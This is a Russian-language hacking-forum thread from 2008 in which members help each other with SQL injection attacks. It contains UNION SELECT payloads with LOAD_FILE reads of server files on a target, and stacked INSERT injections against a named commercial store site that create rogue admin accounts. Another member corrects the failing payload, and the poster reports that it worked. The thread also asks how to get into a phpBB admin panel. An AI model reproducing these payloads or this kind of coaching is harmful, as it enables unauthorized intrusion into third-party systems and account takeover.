14.04.2008, 22:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от Ershik
Ну не знаю..там с кодировкой траблы, может из-за
этого?
У меня кстати аес получалось( вспомнил вроде)
aes_decrypt(aes_encrypt(любое твоё слово,0x71),0x71)
|
|
|
14.04.2008, 21:54
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Ershik
Проблемы кодировки пробуй:
UNHEX:HEX
AES_DECRYPT:AES_ENCRYPT
cast(строка+as+binary)
По идее любое подойдёт
|
|
|
|
15.04.2008, 05:15
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
С нами:
9671366
Репутация:
332
|
|
Скажите я могу читать или писать файлы на сервере MYSql 4 ветки:
http://192.168.2.100/stats/map.php?id=1+and+substring(version(),1,1)=4
выполняется
http://192.168.2.100/stats/map.php?id=1+limit+5+union+select+1,2,3,4,5,6,7,8, 9,10,11,concat(version(),"%20",database(),"%20",SE SSION_USER()),13,14,15,16,17/*
как читать писать в файл зная дирикторию... но к сожелению не знаю права на папки.... и можноли тут изменять таблицу
Есть ли что то типа database() но выводящее где база находится я имею ввиду IP....
еще вот такая ситуация :
подобрал столбцы 12 столбец выводится как текст:
Код:
http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
а вот это выводит без ошибок но там где выводится 12 столбец пусто....
Код:
http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,LOAD_FILE('/var/www/html/stats/includes/class_db.php'),13,14,15,16,17/*
так же заместо loadfile вставляю CASE+WHEN+(1=1)+THEN+'A'+ELSE+'B'+END работает выводит А
привожу дополнительные сведения о SQL:
версия sql 4.0.20
Имя юзера gamecs@localhost
имя базы ps_stats
как я понял из session_user то запросы выполняются под gamecs@localhost жду помощи... +++
Последний раз редактировалось KIR@PRO; 15.04.2008 в 06:28..
|
|
|
|
15.04.2008, 14:48
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Велемир, ты написал полную ересь, причем поправлять тебя смысла нет, т.к. ересь почти во всем твоем посте
__________________
Карфаген должен быть разрушен...
|
|
|
|
15.04.2008, 16:30
|
|
Познающий
Регистрация: 12.02.2008
Сообщений: 90
С нами:
9601728
Репутация:
20
|
|
Вообщем форум phpBB я знаю акк админа но в админку нельзя поапасть т.к. требует акк и пароль вваести(админские неподходят) можно ли как нибуть зайти в админку? или сделать дамп без входа в админку?
|
|
|
|
15.04.2008, 16:36
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Rogun
Привязка по IP возможно
|
|
|
|
15.04.2008, 16:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
При запросе http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserID,Admin,U serName,Password)+values(2,1,'tratata','gangsta')--
Выдаёт ошибку:
[Microsoft][ODBC SQL Server Driver][SQL Server]Cannot insert explicit value for identity column in table 'USERS' when IDENTITY_INSERT is set to OFF
Мне страшно о_О...
|
|
|
|
15.04.2008, 17:29
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
IDENTITY_INSERT отключен для UserID т.е. ты не можешь вставлять туда значения вручную, пробуй без нее:
http://www.countryman.com/store/product.asp?id=1;+insert+into+users(Admin,U serName,Password)+values(1,'tratata','gangsta')--
__________________
Карфаген должен быть разрушен...
|
|
|
|
15.04.2008, 17:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Няяяя,пасибки:Р.Щас тоже попробывал добавить,всё получилось!) (*Пошёл прыгать с абрыва*)
|
|
|
|
15.04.2008, 17:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserName,Admin ,Password)+values('Welka','1','realkilla')--
Чойто не фкурил. Ввёл 2 раза неверно, и уже типо аблом -
http://www.countryman.com/admin/
You have exceeded the maximum
allowed log in attempts.
Тобишь всё должно быть верно о_О,но не пустило
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
